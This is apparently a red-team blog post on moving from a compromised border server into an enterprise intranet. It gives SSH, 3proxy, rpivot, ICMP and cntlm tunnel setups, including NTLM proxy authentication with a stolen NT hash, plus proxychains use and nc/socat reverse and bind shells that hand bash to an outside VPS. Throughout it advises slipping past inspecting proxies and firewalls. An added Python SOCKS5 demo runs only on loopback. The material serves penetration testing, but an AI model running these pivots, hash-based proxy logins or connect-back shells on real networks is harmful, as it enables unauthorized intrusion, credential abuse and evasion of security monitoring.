Techniques for crossing the network border

Posted by tzul at 2020-04-03

In enterprise security engagements the red team regularly ends up in the same situation: it has gained a foothold on the enterprise network border, for example a web shell on a web server, and now has to move one step further in. Testing the internal network from that foothold requires tunnel forwarding: a path through the border firewall, proxy servers and the other security devices in between, so that deeper testing can be carried out. This article covers the various ways of getting from the border into the intranet.

Typical boundary network architecture

The sections below refer to the following hosts: the local machine (the tester's workstation), a VPS on the Internet that the tester controls, servera (the enterprise proxy server through which border hosts reach the Internet), serverb (the compromised border host, for example the web server carrying the web shell) and the target intranet / office network behind it. Addresses written in angle brackets are placeholders for the real ones.

Building tunnels with SSH

Dynamic port forwarding

Principle: ssh -D opens a dynamic SOCKS4/SOCKS5 proxy on the local port given after -D. Any program that can speak SOCKS4 or SOCKS5 can be pointed at that port; its connections are carried through the encrypted SSH session and are made (and names resolved) from the SSH server's side of the network.

Run locally:

ssh -D 1080 root@<vps>

Effect: port 1080 opens on the local machine, and any application with SOCKS support can use 127.0.0.1:1080 as its proxy; its traffic then leaves the network from the VPS. The same trick works from inside the target intranet:

Run on serverb:

ssh -D 1080 root@<office-host>

serverb now has a SOCKS proxy on port 1080 whose connections come out on the office network, so tools run on serverb reach office-network resources through it. If serverb's SSH port is reachable from outside,

Run locally:

ssh -D 1080 root@<serverb>

Local port 1080 then proxies straight into the target intranet through serverb.
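The exchange behind a dynamic forward is the SOCKS5 CONNECT handshake: the client names a destination, the proxy (the sshd end of the tunnel) connects to it and reports success or failure, and from then on bytes are relayed both ways. The following is an added example, not code from the original post or from OpenSSH: a minimal no-auth SOCKS5 proxy and a client that connects through it, both on loopback, with a constructed echo service standing in for an intranet host. It also handles the failure mode most often seen when debugging a tunnel, a destination that refuses the connection (REP 0x05). The same relay loop without the negotiation is what a plain port forward (ssh -L, 3proxy's tcppm) does.

```python
import select
import socket
import struct
import threading

def _recv_exact(sock, n):
    """Read exactly n bytes; SOCKS fields are fixed-size, so a short read is an error."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS exchange")
        buf += chunk
    return buf

def socks5_connect(proxy_host, proxy_port, dest_host, dest_port, timeout=5):
    """Client side: a TCP stream to dest via a no-auth SOCKS5 proxy (what proxychains or curl do against ssh -D)."""
    s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    s.sendall(b"\x05\x01\x00")                  # VER=5, NMETHODS=1, METHOD 0x00 = no authentication
    ver, method = _recv_exact(s, 2)
    if ver != 5 or method != 0:
        s.close()
        raise ConnectionError(f"proxy refused no-auth (METHOD={method:#x})")
    name = dest_host.encode()                   # ATYP=3: send the name, the proxy resolves it (cf. proxy_dns)
    s.sendall(b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", dest_port))
    _ver, rep, _rsv, atyp = _recv_exact(s, 4)   # CMD 0x01 = CONNECT; REP in the reply is the verdict
    if rep != 0:
        s.close()
        raise ConnectionError(f"CONNECT failed (REP={rep:#x})")
    # drain BND.ADDR (IPv4 / domain / IPv6) plus BND.PORT; from here on the stream is the remote socket
    _recv_exact(s, 2 + (_recv_exact(s, 1)[0] if atyp == 3 else (4 if atyp == 1 else 16)))
    return s

def _relay(a, b):
    # data phase: copy bytes both ways until either side closes
    try:
        while True:
            src = select.select([a, b], [], [])[0][0]
            data = src.recv(65536)
            if not data:
                return
            (b if src is a else a).sendall(data)
    finally:
        a.close()
        b.close()

def _reply(client, rep, port=0):
    # REP: 0 succeeded, 5 connection refused, 7 command not supported, 8 address type not supported
    client.sendall(b"\x05" + bytes([rep]) + b"\x00\x01" + bytes(4) + struct.pack("!H", port))

def _serve_client(client):
    """Server side (the role sshd plays for ssh -D): negotiate, connect out, relay."""
    try:
        ver, nmethods = _recv_exact(client, 2)
        if ver != 5 or 0 not in _recv_exact(client, nmethods):
            return client.sendall(b"\x05\xff")  # no acceptable method
        client.sendall(b"\x05\x00")
        _ver, cmd, _rsv, atyp = _recv_exact(client, 4)
        if atyp != 3:
            return _reply(client, 8)            # only domain-name destinations here; real proxies also take ATYP 1/4
        host = _recv_exact(client, _recv_exact(client, 1)[0]).decode()
        port = struct.unpack("!H", _recv_exact(client, 2))[0]
        if cmd != 1:
            return _reply(client, 7)            # only CONNECT, no BIND / UDP ASSOCIATE
        try:
            remote = socket.create_connection((host, port), timeout=5)
        except OSError:
            return _reply(client, 5)            # destination unreachable or refusing
        _reply(client, 0, remote.getsockname()[1])
        _relay(client, remote)
    except (ConnectionError, OSError):
        pass
    finally:
        client.close()

def _listen(handler):
    # ephemeral loopback listener; every accepted connection runs handler in its own thread
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    def loop():
        while True:
            threading.Thread(target=handler, args=(srv.accept()[0],), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def demo():
    """Constructed scenario (added example, not from the post): an 'intranet' echo service reached only via the proxy."""
    echo_port = _listen(lambda c: (c.sendall(c.recv(4096)), c.close()))
    s = socks5_connect("127.0.0.1", _listen(_serve_client), "127.0.0.1", echo_port)
    s.sendall(b"ping through socks")
    reply = s.recv(4096)
    s.close()
    return reply

def demo_refused():
    """Failure mode: nothing accepts on port 0, so the proxy answers REP=0x5 and the client raises."""
    try:
        socks5_connect("127.0.0.1", _listen(_serve_client), "127.0.0.1", 0)
    except ConnectionError as e:
        return str(e)
```

demo() returns the message echoed back through the proxy and demo_refused() returns the refused-destination error. Against a real listener, socks5_connect("127.0.0.1", 1080, host, port) after ssh -D 1080 returns a socket to host:port as seen from the SSH server, which makes it a quick check that a tunnel really exits where it should.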

Local port forwarding

Principle: ssh -L forwards a port on the machine running ssh (the client) to a chosen host:port as seen from the SSH server. ssh listens on the local port, and every connection made to it is carried through the tunnel and delivered by the server to the target.

On serverb:

ssh -L 7001:localhost:7070 root@<vps>

Effect: serverb listens on port 7001 and hands everything sent to it to port 7070 on the VPS (localhost in the forwarding spec is evaluated on the VPS, not on serverb).

Use: run a SOCKS proxy on the VPS listening on 7070 and set 127.0.0.1:7001 as the proxy in the tools on serverb. Their traffic then leaves through the VPS inside the encrypted SSH session, which matters when serverb's own outbound access is filtered or inspected. ssh binds the listener to loopback by default; add -g (or a bind address such as -L 0.0.0.0:7001:localhost:7070) if other intranet hosts should be able to use it.

Remote port forwarding

Principle: ssh -R is the mirror image. ssh asks the SSH server to listen on a port, and every connection to that port on the server is carried back through the tunnel and delivered to the chosen host:port as seen from the machine running ssh.

On serverb:

ssh -R 7070:<intranet-host>:3306 root@<vps>

Effect: the VPS listens on port 7070; a connection to vps:7070 is delivered by serverb to port 3306 of <intranet-host>, which only serverb can reach. sshd binds such remote listeners to loopback unless GatewayPorts yes (or clientspecified) is set in the VPS's sshd_config, so without that setting connect from the VPS itself or chain another hop through it.

Tunnel with 3proxy

Introduction

Tool address:

3proxy is a cross-platform proxy server originating in Russia; it supports HTTP, HTTPS, FTP, SOCKS4, SOCKS4a, SOCKS5, SOCKS5a and other proxy types.

Usage:

windows: 3proxy.exe config_file
linux: ./3proxy config_file

Everything is controlled through the configuration file; the examples below are complete configuration files.

Set up a SOCKS proxy

The configuration is as follows:

#!/usr/local/bin/3proxy
socks -p1080

Effect: starts a SOCKS proxy listening on port 1080. Without an auth directive it accepts any client, so on a compromised host restrict it (with auth and allow lines, or by binding it to loopback with -i127.0.0.1 and reaching it through one of the SSH tunnels above) so that nobody else on the network can ride your pivot.

Implement port forwarding

The configuration is as follows:

#!/usr/local/bin/3proxy
tcppm 1080 <vps-ip> 7070

Effect: forwards local port 1080 to port 7070 of the VPS. tcppm (TCP port mapping) takes the local port first, then the target host and port; it is a plain TCP relay with no SOCKS negotiation.

Other functions can be found in the 3proxy documentation.

Port forwarding using Plink

Plink, the command-line connection tool that ships with PuTTY, is the Windows counterpart of ssh and accepts the same -D, -L and -R options, so the commands above carry over unchanged; add -N to skip opening a remote shell and -pw to give the password on the command line when there is no interactive terminal (a web shell, for instance).

Using rpivot as a reverse proxy

Tool address:

Usage:

On the VPS:

python server.py --proxy-port 1080 --server-port 9999 --server-ip <vps-ip>

Effect: the server side opens a SOCKS4 proxy on port 1080 of the VPS and waits on port 9999 for the client to call in.

On serverb:

python client.py --server-ip <vps-ip> --server-port 9999

Effect: serverb connects out to port 9999 of the VPS. From then on, every connection made to port 1080 of the VPS is carried back over that single outbound connection and made from serverb, so the target intranet is reachable through vps:1080. Because serverb only ever connects outward, this works when no inbound port to serverb is open, which is the usual case behind a border firewall.

Establishing an ICMP tunnel

Tool address:

Download and compile hans on serverb.

Run as root:

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
./hans -s <tunnel-network> -p password

The first line stops the kernel from answering echo requests itself so that hans receives them; the second starts the hans server, which creates a tun interface with the first address of <tunnel-network> (e.g. 10.1.2.0, giving the server 10.1.2.1) and accepts clients that know the password.

Run locally (also as root, since hans needs a raw socket and a tun device):

./hans -f -c <serverb-ip> -p password -v

Effect: hans stays in the foreground (-f) and brings up a tun interface on the local machine; serverb is now reachable at its tunnel address over nothing but ICMP echo, so you can SSH to it or route through it even where TCP to serverb is blocked.

Getting through an authenticating proxy

Condition: serverb can only reach the Internet through servera, a proxy server that requires domain (NTLM) authentication.

If the credentials obtained are a cleartext username and password, any tool that supports proxy authentication can be pointed at servera directly. If only the password hash is obtained and it cannot be cracked, use cntlm:

Tool address:

Principle: cntlm runs on serverb as a local proxy that performs the NTLM authentication to servera on the client's behalf, and its Tunnel directive maps a local port to a remote host:port by issuing an HTTP CONNECT through servera; the NT hash alone is enough for it to authenticate.

Usage, on serverb:

windows: cntlm.exe -c config.conf
linux: ./cntlm -c config.conf

Sample configuration file:
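A cntlm.conf that produces the mapping described in this section. It is added here as an illustration and is not the post's original sample file; the account name, the hash, servera's address and port, and the VPS address are placeholders.

```ini
# cntlm.conf for serverb: authenticate to servera with the NT hash, expose one tunnel.
# Added example; <servera-ip>, <vps-ip>, the account and the hash are placeholders.

# Domain account whose NT hash was obtained
Username        svc_web
Domain          CORP

# NT hash only ("cntlm -H -u svc_web -d CORP" prints this format from a cleartext
# password; here it is the dumped hash). Auth NT sends the NT response alone,
# so no PassLM line is needed.
PassNT          0123456789ABCDEF0123456789ABCDEF
Auth            NT
# If servera insists on NTLMv2, use "Auth NTLMv2" with a PassNTLMv2 line instead.

# The authenticating proxy (servera) and what to reach without it
Proxy           <servera-ip>:8080
NoProxy         localhost, 127.0.0.*, 10.*, 192.168.*

# Plain HTTP proxy for tools on serverb and on other intranet hosts
Listen          3128
# Accept connections from other hosts, not only from loopback
Gateway         yes

# serverb:2222 -> HTTP CONNECT <vps-ip>:443 through servera
Tunnel          2222:<vps-ip>:443
```

Gateway yes is what lets other intranet machines use the tunnel; without it cntlm listens on loopback only. Port 443 is chosen because an authenticating proxy normally permits CONNECT to it without a second look.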

Effect: an intranet server connecting to port 2222 of serverb actually reaches port 443 of the VPS, while servera sees only an authenticated CONNECT from a domain account.

Accessing the intranet through a SOCKS proxy

Suppose the proxy address is <proxy-ip>, listening on port 1080 (for example the ssh -D or rpivot listener set up above).

Edit /etc/proxychains.conf and add the proxy as the last entry of the [ProxyList] section:

vim /etc/proxychains.conf
socks5 <proxy-ip> 1080

Keep proxy_dns enabled so that name resolution also goes through the proxy; otherwise lookups for intranet names leak out of the tunnel and fail.

Usage:

proxychains <tool> <user>@<target> ipconfig

proxychains wraps any dynamically linked TCP client, here a remote-command tool run against a Windows host in the intranet; statically linked binaries and programs that use raw sockets or UDP are not intercepted.

Reverse shell with nc

Listen on the VPS:

nc -vv -l -p 4444

On serverb: connect back to port 4444 of the VPS (the socat commands below give a connect-back shell of the same kind).
Forward (bind) shell

On serverb, listen on port 1337 and give each connection a bash with a pty:

socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane

Then connect from the VPS (or the local machine) and attach the local terminal to it:

socat FILE:`tty`,raw,echo=0 TCP:<serverb-ip>:1337

Reverse shell

On the VPS, listen on port 1337 and attach the terminal:

socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0

On serverb, connect back and hand over a bash:

socat TCP4:<vps-ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

The pty,stderr,setsid,sigint,sane options give a fully interactive shell (job control, Ctrl-C delivered to the remote process, sane terminal modes), which a plain nc -e shell does not. Both variants are cleartext TCP; wrap them in one of the tunnels above or use socat's OPENSSL addresses when the traffic crosses an inspected segment.